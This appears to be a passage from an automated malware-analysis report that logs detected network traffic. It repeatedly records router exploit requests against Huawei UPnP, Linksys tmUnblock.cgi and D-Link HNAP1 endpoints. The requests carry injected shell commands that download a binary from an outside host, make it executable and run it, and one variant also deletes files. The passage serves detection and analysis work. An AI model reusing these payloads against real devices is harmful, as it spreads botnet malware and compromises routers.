/tmp/.sys64 -r sys64.mips; /bin/busybox chmod 777 * /tmp/.sys64; /tmp/.sys64 huw.s)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 7a 2e 68 78 68 6b 2e 63 63 20 2d 6c 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 2d 72 20 73 79 73 36 34 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 73 79 73 36 34 3b 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 68 75 77 2e 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g z.hxhk.cc -l /tmp/.sys64 -r sys64.mips; /bin/busybox chmod 777 * /tmp/.sys64; /tmp/.sys64 huw.s)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 7a 2e 68 78 68 6b 2e 63 63 20 2d 6c 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 2d 72 20 73 79 73 36 34 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 73 79 73 36 34 3b 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 68 75 77 2e 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g z.hxhk.cc -l /tmp/.sys64 -r sys64.mips; /bin/busybox chmod 777 * /tmp/.sys64; /tmp/.sys64 huw.s)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://z.hxhk.cc/sys64.mips && chmod +x sys64.mips;./sys64.mips hn.s`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://z.hxhk.cc/sys64.mips && chmod +x sys64.mips;./sys64.mips hn.s`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 7a 2e 68 78 68 6b 2e 63 63 20 2d 6c 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 2d 72 20 73 79 73 36 34 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 73 79 73 36 34 3b 20 2f 74 6d 70 2f 2e 73 79 73 36 34 20 68 75 77 2e 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g z.hxhk.cc -l /tmp/.sys64 -r sys64.mips; /bin/busybox chmod 777 * /tmp/.sys64; /tmp/.sys64 huw.s)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://z.hxhk.cc/sys64.mips && chmod +x sys64.mips;./sys64.mips hn.s`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://z.hxhk.cc/sys64.mips && chmod +x sys64.mips;./sys64.mips hn.s`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://z.hxhk.cc/sys64.mips && chmod +x sys64.mips;./sys64.mips hn.s`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 